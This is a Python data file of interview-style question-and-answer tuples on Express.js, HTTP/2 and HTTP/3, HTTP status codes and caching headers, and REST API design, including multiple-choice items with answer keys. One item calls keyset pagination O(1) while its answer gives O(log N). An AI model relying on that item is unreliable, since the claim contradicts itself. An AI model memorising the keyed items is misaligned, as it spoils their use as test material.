    ("What does express-mongo-sanitize do?", "It removes keys containing '$' and '.' from user inputs, preventing NoSQL injection operators from being passed into MongoDB queries.", "Easy", "Security", "const mongoSanitize = require('express-mongo-sanitize');\napp.use(mongoSanitize());", "How can an attacker use '$gt' in NoSQL injection?"),
    ("Express MCQ: Which function redirects the user temporarily (HTTP 302) to another URL?", "Option A is correct. res.redirect('/login') defaults to 302 Found.", "Easy", "MCQ", "", {"A": "res.redirect('/login')", "B": "res.forward('/login')", "C": "res.sendRedirect('/login')", "D": "res.route('/login')"}, "A", "How do you specify a 301 redirect?"),
    ("Express MCQ: In Express 5, what happens when an async route handler throws an unhandled rejected promise?", "Option B is correct. Express 5 automatically catches it and forwards it to error middleware.", "Easy", "MCQ", "", {"A": "Process crashes", "B": "It is passed to error middleware automatically", "C": "Client hangs", "D": "Returns 500 automatically without middleware"}, "B", "How did Express 4 handle this?"),
    ("Express Architecture Coding: Create a router with /login and /register mounted under /api/v1/auth.", "const router = express.Router(); router.post('/login', loginHandler); router.post('/register', registerHandler); app.use('/api/v1/auth', router);", "Easy", "Coding", "const authRouter = express.Router();\nauthRouter.post('/login', (req, res) => res.json({ msg: 'Logged in' }));\nauthRouter.post('/register', (req, res) => res.json({ msg: 'Registered' }));\n\napp.use('/api/v1/auth', authRouter);", "What is the full URL of the login route?"),
    ("Express Debugging: An async route throws an error in Express 4, but the error middleware never triggers. Why?", "In Express 4, async errors are not caught automatically; wrap in try/catch and call next(error), or use express-async-errors.", "Easy", "Debugging", "app.get('/users', async (req, res, next) => {\n  try {\n    const users = await User.find();\n    res.json(users);\n  } catch (err) {\n    next(err); // Must pass to next() in Express 4!\n  }\n});", "What happens if next(err) is omitted?"),
    ("What is graceful shutdown of Express server when connected to MongoDB/PostgreSQL?", "Stop server from accepting new requests (server.close), wait for ongoing requests to finish, close database connections, then call process.exit(0).", "Intermediate", "Best Practice", "", "Why should health check endpoints return JSON with uptime rather than static 200?",),
    ("What should an Express health check endpoint inspect?", "It should verify that the application process is running AND essential dependencies (database connection, Redis cache) are reachable and healthy.", "Intermediate", "Architecture", "app.get('/health', async (req, res) => {\n  const dbStatus = mongoose.connection.readyState === 1;\n  const status = dbStatus ? 200 : 503;\n  res.status(status).json({ status: dbStatus ? 'UP' : 'DOWN', uptime: process.uptime() });\n});", "What status should be returned if database is down?"),
    ("What is the difference between req.protocol and req.secure in Express?", "req.protocol returns 'http' or 'https'. req.secure is a boolean equivalent to req.protocol === 'https'.", "Easy", "Concept", "", "What does app.enable('trust proxy') do for req.secure?",),
    ("Why is app.enable('trust proxy') required for req.secure behind load balancers?", "Cloud load balancers terminate SSL and communicate via HTTP to Node. With 'trust proxy', Express reads the 'X-Forwarded-Proto' header to correctly set req.secure to true.", "Intermediate", "Scenario", "app.enable('trust proxy');", "What happens if trust proxy is false behind Nginx?")
]

rest_extra_items = [
    # HTTP/2, HTTP/3 & Transport Protocols - 18 Qs
    ("What is the main limitation of HTTP/1.1 solved by HTTP/2?", "HTTP/1.1 suffers from Head-of-Line (HoL) blocking on TCP connections: only one request can be processed at a time per socket. HTTP/2 introduces binary multiplexing.", "Intermediate", "Comparison", "", "What is Multiplexing in HTTP/2?"),
    ("What is Multiplexing in HTTP/2?", "Multiplexing allows multiple bidirectional request and response streams to interleave concurrently over a single TCP connection without blocking each other.", "Intermediate", "Concept", "", "What is HPACK in HTTP/2?"),
    ("What is HPACK header compression in HTTP/2?", "A compression format designed for HTTP/2 headers that maintains an indexed table of previously sent headers, dramatically reducing redundant header bandwidth.", "Intermediate", "Concept", "", "What is HTTP/2 Server Push and why has it fallen out of favor?"),
    ("What was HTTP/2 Server Push?", "A mechanism allowing the server to proactively send assets (CSS, JS) to the client before the client requested them; largely deprecated due to cache race issues and 103 Early Hints.", "Advanced", "Concept", "", "What is HTTP 103 Early Hints?"),
    ("What is HTTP status code 103 Early Hints?", "An informational status code sent before the main response headers to allow browsers to preload critical CSS/JS resources while the server prepares the main HTML.", "Intermediate", "Concept", "HTTP/1.1 103 Early Hints\nLink: </style.css>; rel=preload; as=style", "Which status code family is 103?"),
    ("What is HTTP/3 and what underlying transport protocol does it use?", "HTTP/3 is the newest HTTP standard built on QUIC (Quick UDP Internet Connections) rather than TCP, eliminating TCP-level head-of-line blocking.", "Intermediate", "Concept", "", "Why does HTTP/3 use UDP instead of TCP?"),
    ("Why does HTTP/3 use UDP?", "TCP requires a multi-step handshake and suffers packet-loss stalling for all streams. UDP allows QUIC to handle congestion control, encryption, and independent packet streams natively.", "Advanced", "Concept", "", "What is 0-RTT connection resumption in HTTP/3 / QUIC?"),
    ("What is 0-RTT (Zero Round-Trip Time) in TLS 1.3 / QUIC?", "A feature allowing returning clients to send encrypted request data immediately in the very first packet using cached session tickets without waiting for a TLS handshake.", "Advanced", "Performance", "", "What is the difference between TCP and UDP in web networking?"),
    ("What are the key differences between TCP and UDP?", "TCP is connection-oriented, reliable (guarantees packet delivery and ordering via ACKs and retransmissions), but slower. UDP is connectionless, fast, has minimal overhead, but does not guarantee delivery.", "Easy", "Comparison", "", "Which protocol (TCP or UDP) does DNS typically use?"),
    ("Which protocol does DNS use by default?", "DNS queries typically use UDP on port 53 for speed and low overhead; fallback to TCP occurs for large responses (> 512 bytes) or zone transfers.", "Easy", "Concept", "", "When does DNS use TCP?"),
    ("HTTP Protocols MCQ: What transport layer protocol does HTTP/3 operate on?", "Option B is correct. HTTP/3 runs on QUIC over UDP.", "Easy", "MCQ", "", {"A": "TCP", "B": "UDP", "C": "SCTP", "D": "ICMP"}, "B", "What transport does HTTP/2 use?"),
    ("HTTP Protocols MCQ: Which feature in HTTP/2 allows sending multiple concurrent requests over a single TCP connection?", "Option A is correct. Multiplexing enables interleaving streams.", "Easy", "MCQ", "", {"A": "Multiplexing", "B": "Chunked transfer", "C": "Pipelining", "D": "WebSockets"}, "A", "What was the HTTP/1.1 limitation?"),
    ("HTTP Protocols MCQ: What status code represents 103 Early Hints for preloading assets?", "Option C is correct. 103 Early Hints provides early resource links.", "Intermediate", "MCQ", "", {"A": "100", "B": "101", "C": "103", "D": "200"}, "C", "What does 101 represent?"),
    ("What does HTTP status code 101 Switching Protocols represent?", "The server agrees to switch protocols as requested in the client's Upgrade header, commonly used to upgrade HTTP to a WebSocket connection.", "Easy", "Concept", "HTTP/1.1 101 Switching Protocols\nUpgrade: websocket\nConnection: Upgrade", "When does 101 fire during WebSocket handshake?"),
    ("What headers are sent in a WebSocket upgrade handshake?", "Client sends: 'Upgrade: websocket', 'Connection: Upgrade', 'Sec-WebSocket-Key', 'Sec-WebSocket-Version: 13'.", "Intermediate", "Practical", "", "What is HTTP Keep-Alive (Connection: keep-alive)?"),
    ("What does 'Connection: keep-alive' do in HTTP/1.1?", "It instructs the server and client to keep the underlying TCP connection open for subsequent requests, avoiding TCP three-way handshake overhead.", "Easy", "Concept", "Connection: keep-alive", "Is Keep-Alive default in HTTP/1.1?"),
    ("Is Keep-Alive default in HTTP/1.1?", "Yes. In HTTP/1.1, all connections are persistent by default unless 'Connection: close' is explicitly specified.", "Easy", "Concept", "", "What is HTTP pipelining in HTTP/1.1 and why did it fail in practice?"),
    ("Why was HTTP/1.1 Pipelining rarely enabled in browsers?", "Responses had to arrive in the exact order requested. If the first request stalled, all subsequent responses were blocked (Head-of-Line blocking) and buggy proxies broke connections.", "Advanced", "Concept", "", "How did HTTP/2 solve the pipelining problem?"),
    ("How did HTTP/2 solve the pipelining problem?", "Through independent binary stream framing: packets from different streams can arrive out of order and be reassembled by stream IDs without blocking.", "Intermediate", "Concept", "", "What is ALPN (Application-Layer Protocol Negotiation)?")
]

rest_extra_items_part2 = [
    # Status Codes & Headers in Depth - 26 Qs
    ("What is the difference between 401 Unauthorized and 403 Forbidden?", "401 means authentication is missing or invalid (client must log in). 403 means client identity is known, but access to this specific resource is forbidden (insufficient privileges).", "Easy", "Comparison", "", "Can 401 include a WWW-Authenticate header?"),
    ("What header MUST be returned with a 401 Unauthorized response?", "The 'WWW-Authenticate' header specifying the authentication scheme supported (e.g. WWW-Authenticate: Bearer realm=\"api\").", "Intermediate", "Concept", "WWW-Authenticate: Bearer error=\"invalid_token\"", "What status code indicates a resource was permanently removed and will not return?"),
    ("What is HTTP status code 410 Gone and how does it differ from 404 Not Found?", "404 means the resource was not found right now. 410 explicitly confirms the resource existed previously but has been permanently deleted and will never return.", "Intermediate", "Comparison", "", "Why is 410 useful for SEO crawlers?"),
    ("Why is HTTP 410 Gone beneficial for search engine crawlers?", "It instructs search engines to immediately de-index the page and stop attempting to crawl the URL, preserving crawl budget.", "Intermediate", "Concept", "", "What is HTTP status code 405 Method Not Allowed?"),
    ("What is HTTP status code 405 Method Not Allowed and what header must accompany it?", "405 indicates the resource exists, but does not support the requested HTTP method (e.g. POST on a read-only endpoint). It MUST include the 'Allow' header listing supported methods.", "Easy", "Concept", "HTTP/1.1 405 Method Not Allowed\nAllow: GET, HEAD, OPTIONS", "What status is returned for unsupported media format?"),
    ("What is HTTP status code 415 Unsupported Media Type?", "The server refuses to accept the request because the payload format (Content-Type) is in an unsupported format (e.g. client sent XML, server accepts only JSON).", "Easy", "Concept", "", "What is HTTP status code 406 Not Acceptable?"),
    ("What is HTTP status code 406 Not Acceptable?", "The server cannot produce a response matching the list of acceptable values defined in the request's Accept headers (e.g. Accept: application/xml when server only generates JSON).", "Intermediate", "Concept", "", "What is HTTP status code 409 Conflict?",),
    ("What is HTTP status code 409 Conflict and when should it be used?", "409 indicates the request cannot be completed due to a conflict with current resource state (e.g. trying to register an email that already exists, or version conflict).", "Easy", "Scenario", "HTTP/1.1 409 Conflict\n{ \"error\": \"User with email already exists\" }", "What status code indicates a payload is too large?"),
    ("What is HTTP status code 413 Content Too Large (Payload Too Large)?", "The request entity exceeds the maximum size limit defined by the server (e.g. uploaded image exceeds 10MB).", "Easy", "Concept", "", "What is HTTP status code 422 Unprocessable Entity?",),
    ("What is HTTP status code 422 Unprocessable Content?", "The server understands the content type and syntax of the request, but was unable to process the contained semantic instructions (commonly used for form/JSON field validation errors).", "Easy", "Concept", "HTTP/1.1 422 Unprocessable Entity\n{ \"errors\": [{ \"field\": \"email\", \"message\": \"Invalid email domain\" }] }", "How does 422 differ from 400 Bad Request?"),
    ("What is the difference between 400 Bad Request and 422 Unprocessable Content?", "400 is for malformed syntax (e.g. broken JSON brackets). 422 is for valid syntax but invalid semantics (e.g. valid JSON, but age is -5).", "Intermediate", "Comparison", "", "What is HTTP status code 429 Too Many Requests?"),
    ("What is HTTP status code 429 Too Many Requests and what header should accompany it?", "429 indicates the client has sent too many requests in a given amount of time (rate limit exceeded). Should include 'Retry-After' indicating when to retry.", "Easy", "Concept", "HTTP/1.1 429 Too Many Requests\nRetry-After: 60", "What are the 5xx server errors?"),
    ("What is the difference between 500, 502, 503, and 504 status codes?", "500: Internal server crash. 502 Bad Gateway: Proxy received invalid response from upstream server. 503 Service Unavailable: Server is overloaded or down for maintenance. 504 Gateway Timeout: Upstream server timed out.", "Intermediate", "Comparison", "", "When does Nginx return 502 Bad Gateway with Node.js?"),
    ("Why does Nginx return 502 Bad Gateway when proxying to a Node.js application?", "The Node.js application has crashed or is not running on the specified localhost port, so Nginx cannot establish a connection.", "Easy", "Debugging", "", "When does Nginx return 504 Gateway Timeout with Node.js?"),
    ("Why does Nginx return 504 Gateway Timeout when proxying to Node.js?", "The Node.js server accepted the connection, but took longer than Nginx's proxy_read_timeout (e.g. 60s) to return an HTTP response (due to an infinite loop or hanging query).", "Intermediate", "Debugging", "", "What is the ETag header and how does conditional caching work?"),
    ("How do ETag and If-None-Match headers provide conditional caching?", "Server sends ETag: \"hash123\" with content. Next time, client sends If-None-Match: \"hash123\". If content hasn't changed, server returns 304 Not Modified without sending the body.", "Intermediate", "Concept", "Client: GET /data\nIf-None-Match: \"abc\"\n\nServer: 304 Not Modified", "What is a weak ETag vs strong ETag?"),
    ("What is the difference between a strong ETag and a weak ETag (W/\"...\")?", "A strong ETag guarantees byte-for-byte exact equality. A weak ETag (prefixed with W/) guarantees semantic equivalence (content is equivalent even if minor formatting differs).", "Advanced", "Concept", "", "What does the 'Vary' HTTP header do?"),
    ("What does the 'Vary' HTTP response header do?", "It tells caching proxies which request headers must match for a cached response to be used (e.g. Vary: Accept-Encoding or Vary: Origin).", "Intermediate", "Concept", "Vary: Accept-Encoding, User-Agent", "Why is Vary: Origin crucial for CORS responses?"),
    ("Why is 'Vary: Origin' required when caching responses with Access-Control-Allow-Origin?", "Without Vary: Origin, a CDN might cache a response for origin A and serve it to origin B, causing CORS security errors or unauthorized data sharing.", "Intermediate", "Security", "", "What does Cache-Control: no-cache mean?"),
    ("What does 'Cache-Control: no-cache' actually mean?", "It does NOT mean 'do not cache'. It means the browser CAN store the response in cache, but MUST revalidate with the origin server (using ETag) before every use.", "Intermediate", "Concept", "Cache-Control: no-cache", "Which directive actually prevents storing cache?"),
    ("What directive completely disables caching on clients and intermediaries?", "Cache-Control: no-store completely forbids browsers and CDNs from storing any part of the request or response in memory or disk cache.", "Easy", "Concept", "Cache-Control: no-store", "What does 'must-revalidate' mean?"),
    ("What does Cache-Control: must-revalidate mean?", "Once a cached response becomes stale (past max-age), the cache MUST revalidate with the server before using it, and must NOT serve stale content if disconnected.", "Intermediate", "Concept", "", "What is Content-Security-Policy (CSP) header?",),
    ("What is Content-Security-Policy (CSP) and what attack does it mitigate?", "CSP is an HTTP header that restricts the resources (scripts, styles, images) browsers are allowed to load for a page, mitigating Cross-Site Scripting (XSS).", "Intermediate", "Security", "Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.com", "What does Strict-Transport-Security (HSTS) do?"),
    ("What does Strict-Transport-Security (HSTS) header do?", "It forces browsers to communicate with the website strictly over HTTPS for the specified duration (e.g. max-age=31536000), preventing SSL-stripping man-in-the-middle attacks.", "Easy", "Security", "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload", "What is HSTS preloading?"),
    ("Status Codes MCQ: Which status code indicates that a requested resource has been permanently deleted and will not return?", "Option B is correct. 410 Gone signals permanent deletion.", "Easy", "MCQ", "", {"A": "404 Not Found", "B": "410 Gone", "C": "400 Bad Request", "D": "204 No Content"}, "B", "What does 404 signal instead?"),
    ("Status Codes MCQ: What status code is returned when a reverse proxy times out waiting for an upstream application to respond?", "Option D is correct. 504 Gateway Timeout indicates upstream timeout.", "Easy", "MCQ", "", {"A": "500", "B": "502", "C": "503", "D": "504"}, "D", "What does 502 indicate?")
]

rest_extra_items_part3 = [
    # REST API Design, Versioning & Best Practices - 26 Qs
    ("What are the 4 common strategies for REST API versioning?", "1. URI Path (/v1/users). 2. Query Parameter (/users?v=1). 3. Custom Header (X-API-Version: 1). 4. Content Negotiation / Accept Header (Accept: application/vnd.app.v1+json).", "Intermediate", "Architecture", "", "Which API versioning strategy is most popular and why?"),
    ("Why is URI path versioning (/api/v1/...) the most widely used strategy?", "It is explicit, easy to read, testable directly in browsers without custom headers, and easily routed by API gateways and reverse proxies.", "Easy", "Concept", "/api/v1/orders", "What is the downside of URI versioning?"),
    ("What is Content Negotiation versioning (Accept header versioning)?", "The client requests a specific API version via the Accept header (Accept: application/vnd.company.v2+json). Keeps URIs clean and truly RESTful.", "Intermediate", "Concept", "Accept: application/vnd.myapi.v2+json", "Why is it less common than URI versioning?"),
    ("What are Richardson Maturity Model levels for REST APIs?", "Level 0: The Swamp of POX (single URI, POST only, like RPC). Level 1: Resources (individual URIs). Level 2: HTTP Verbs (GET, POST, status codes). Level 3: Hypermedia Controls (HATEOAS).", "Advanced", "Architecture", "", "What is HATEOAS in REST?"),
    ("What does HATEOAS stand for and what is its core concept?", "Hypermedia As The Engine Of Application State. API responses include dynamic hypermedia links informing clients what actions/transitions are currently possible.", "Intermediate", "Concept", "{\n  \"id\": 10,\n  \"status\": \"shipped\",\n  \"_links\": {\n    \"self\": { \"href\": \"/orders/10\" },\n    \"cancel\": { \"href\": \"/orders/10/cancel\" }\n  }\n}", "Why do most real-world REST APIs not fully implement HATEOAS?"),
    ("Why is HATEOAS rarely used in practical frontend-backend REST APIs?", "Frontends are tightly coupled with UI flows; parsing dynamic hypermedia links introduces excessive payload overhead and complexity without tangible benefit for SPAs.", "Intermediate", "Scenario", "", "What is OpenAPI / Swagger in REST API engineering?"),
    ("What is OpenAPI (Swagger) and why is it essential?", "OpenAPI is a machine-readable specification standard for describing RESTful APIs (endpoints, parameters, request bodies, responses), enabling automated documentation and client SDK generation.", "Easy", "Concept", "", "What is the difference between OpenAPI and Swagger?"),
    ("What is the difference between OpenAPI and Swagger?", "OpenAPI is the formal specification standard (managed by the Linux Foundation). Swagger is the set of commercial/open-source tools (Swagger UI, Swagger Editor) built to implement OpenAPI.", "Easy", "Comparison", "", "What is Idempotency in HTTP and which methods must be idempotent?"),
    ("Which HTTP methods MUST be idempotent according to the HTTP specification?", "GET, HEAD, PUT, DELETE, OPTIONS, and TRACE. Calling them multiple times with the same input must produce the same server state.", "Easy", "Concept", "", "Is PATCH guaranteed to be idempotent?"),
    ("Is the HTTP PATCH method guaranteed to be idempotent?", "No. A PATCH request like { $inc: { views: 1 } } or appending an item to an array modifies server state each time it runs, making it non-idempotent.", "Intermediate", "Concept", "", "Is POST idempotent?"),
    ("Why is HTTP POST not idempotent?", "Sending multiple identical POST requests typically creates multiple new resources (e.g. submitting an order twice creates two duplicate orders).", "Easy", "Concept", "", "How do payment APIs make POST requests idempotent?"),
    ("How do payment gateways (like Stripe) make non-idempotent POST requests safe against network retries?", "Clients send a unique 'Idempotency-Key' UUID header. The server caches the result for that key; retried requests return the cached result without charging again.", "Intermediate", "Architecture", "Idempotency-Key: 7b84f3c2-482a-4315-992d-986a60395b0c", "What status is returned for duplicate requests with Idempotency Key?"),
    ("What is the difference between safe and idempotent HTTP methods?", "Safe methods (GET, HEAD, OPTIONS) do not modify any server state (read-only). Idempotent methods (PUT, DELETE) may modify state, but repeating the request produces identical state.", "Easy", "Comparison", "", "What is Keyset pagination vs Offset pagination?"),
    ("What is Keyset pagination (cursor pagination) in REST APIs?", "Instead of skipping rows with OFFSET, the query uses the last seen item's indexed unique key: WHERE id > lastSeenId LIMIT 20.", "Intermediate", "Comparison", "GET /api/v1/comments?after_id=450&limit=20", "Why is Keyset pagination O(1) performance?"),
    ("Why is Keyset pagination O(1) index-seek compared to O(N) offset pagination?", "Database indexes directly seek to the cursor position (WHERE id > 1000000) in O(log N) time, whereas OFFSET 1000000 scans and discards 1 million rows.", "Advanced", "Performance", "", "What is a standard error response schema in REST APIs?"),
    ("What are the key fields of a production-grade REST API error response?", "A consistent JSON structure containing: timestamp, status code, error type/code, human-readable message, request path, and optional field validation details.", "Easy", "Architecture", "{\n  \"timestamp\": \"2026-10-03T12:00:00Z\",\n  \"status\": 400,\n  \"error\": \"BAD_REQUEST\",\n  \"message\": \"Validation failed\",\n  \"path\": \"/api/v1/users\",\n  \"details\": [{ \"field\": \"email\", \"issue\": \"Invalid email\" }]\n}", "Why should stack traces be omitted from production error responses?"),
    ("Why must internal stack traces NEVER be returned in production API error responses?", "Stack traces expose internal file paths, framework versions, and database schemas to attackers, facilitating targeted exploitation.", "Easy", "Security", "", "What is API Rate Limiting algorithms: Leaky Bucket vs Token Bucket?"),
    ("What is the difference between Token Bucket and Leaky Bucket rate limiting?", "Token Bucket allows short bursts of traffic (accumulates tokens up to capacity). Leaky Bucket processes requests at a constant, fixed smooth rate, dropping requests if buffer overflows.", "Advanced", "Architecture", "", "What is JWT vs Server-Side Session in REST APIs?"),
    ("What are the trade-offs between JWT (stateless) and Server-Side Sessions in REST APIs?", "JWT: Stateless, scales easily across microservices without central storage, but cannot be easily revoked before expiration. Sessions: Instantly revocable, but require central store (Redis).", "Intermediate", "Comparison", "", "How can a JWT be revoked before its expiration date?"),
    ("How can you revoke a stateless JWT before its expiration?", "1. Maintain a Redis blocklist of revoked token IDs (jti) until their exp date. 2. Store a tokenVersion / passwordChangedAt on the user record and compare against token claims.", "Intermediate", "Security", "", "What is API Gateway Pattern in modern web backends?"),
    ("What responsibilities does an API Gateway handle in backend architectures?", "Request routing, SSL termination, rate limiting, authentication/token verification, CORS handling, response caching, and request aggregation.", "Intermediate", "Architecture", "", "What is reverse proxy?"),
    ("REST Design MCQ: Which HTTP method is both safe and idempotent according to RFC specifications?", "Option A is correct. GET does not mutate server state.", "Easy", "MCQ", "", {"A": "GET", "B": "POST", "C": "DELETE", "D": "PATCH"}, "A", "Is DELETE safe?"),
    ("REST Design MCQ: What is the main disadvantage of offset-based pagination (page=10000)?", "Option B is correct. High offsets scan and discard huge numbers of rows and cause duplicate items if rows are inserted.", "Intermediate", "MCQ", "", {"A": "Does not support sorting", "B": "Degrades database performance and skips/duplicates items on concurrent inserts", "C": "Requires WebSockets", "D": "Cannot return total count"}, "B", "What pagination type solves this?"),
    ("REST Design Debugging: An API developer designed POST /users/delete to remove a user. What is wrong?", "Violates REST resource naming. Use standard HTTP DELETE on the resource URI: DELETE /api/v1/users/:id.", "Easy", "Debugging", "// WRONG: POST /users/delete\n// CORRECT: DELETE /api/v1/users/123", "Why avoid verbs in REST paths?"),
    ("REST Design Coding: Write a standard REST API URL for fetching all active comments on post 42 with pagination.", "GET /api/v1/posts/42/comments?status=active&page=1&limit=20", "Easy", "Coding", "// Hierarchical resource modeling:\nGET /api/v1/posts/42/comments?status=active&page=1&limit=20", "What status should be returned if post 42 does not exist?")
]
